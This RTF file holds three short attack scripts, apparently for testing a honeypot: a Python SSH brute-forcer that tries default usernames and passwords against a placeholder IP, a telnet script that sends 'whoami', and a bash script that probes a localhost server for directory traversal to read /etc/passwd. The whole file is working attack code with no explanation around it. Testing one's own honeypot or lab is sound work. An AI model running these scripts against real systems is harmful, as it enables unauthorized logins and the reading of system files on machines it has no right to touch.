{\rtf1\ansi\ansicpg1252\cocoartf2818
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww28600\viewh14860\viewkind0
\pard\tx720\tx1440\tx2160\tx2880\tx3600\tx4320\tx5040\tx5760\tx6480\tx7200\tx7920\tx8640\pardirnatural\partightenfactor0

\f0\fs24 \cf0 import paramiko\
\
honeypot_ip = "<honeypot_ip>"\
usernames = ["admin", "root", "test"]\
passwords = ["123456", "password", "admin"]\
\
for username in usernames:\
    for password in passwords:\
        try:\
            ssh = paramiko.SSHClient()\
            ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\
            ssh.connect(honeypot_ip, port=2222, username=username, password=password)\
            print(f"[+] Success: \{username\}:\{password\}")\
            ssh.close()\
        except:\
            print(f"[-] Failed: \{username\}:\{password\}")\
\
\
\
\
import telnetlib\
\
honeypot_ip = "<honeypot_ip>"\
port = 2223\
\
try:\
    connection = telnetlib.Telnet(honeypot_ip, port)\
    connection.write(b"whoami\\n")\
    output = connection.read_all()\
    print(output.decode())\
except Exception as e:\
    print(f"Error: \{e\}")\
\
\
\
\
\
\
#!/bin/bash\
# Script to test for directory traversal vulnerability\
TARGET="http://localhost"\
TRAVERSAL_PATH="../../../../../../etc/passwd"\
\
RESPONSE=$(curl -s -o /dev/null -w "%\{http_code\}" "$TARGET/$TRAVERSAL_PATH")\
echo "Checked: $TARGET/$TRAVERSAL_PATH - Status code: $RESPONSE"\
\
if [ "$RESPONSE" == "200" ]; then\
    echo "Potential directory traversal vulnerability detected!"\
    curl "$TARGET/$TRAVERSAL_PATH"\
else\
    echo "No directory traversal vulnerability detected."\
fi}